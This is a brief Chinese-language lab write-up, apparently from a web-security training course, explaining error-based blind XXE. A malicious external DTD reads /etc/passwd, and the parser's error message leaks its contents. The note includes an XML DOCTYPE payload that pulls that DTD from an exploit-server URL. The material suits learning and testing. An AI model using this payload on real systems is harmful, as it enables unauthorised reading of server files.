# XXE Lab6 這題是利用盲注 XXE 利用錯誤訊息回顯本地檔案。 ### 原理: - 惡意 DTD 會先把 `/etc/passwd` 讀入一個實體 `%file`。 - 再製造一個錯誤的檔案路徑:`file:///invalid/%file;`,因為路徑不正確,XML 解析器會丟錯誤。 - 錯誤訊息會顯示該無效路徑裡的 `%file` 內容,也就是 `/etc/passwd` 的內容。 - 這樣就能透過錯誤回顯拿到本地機器檔案。 ### 實作: 一樣進入網站並建立惡意 DTD 檔。  並在送出的 XML 中插入: ``` <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://exploit-0a85004e030490d3818fc43e0117008d.exploit-server.net/exploit"> %xxe; ]> ```   ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up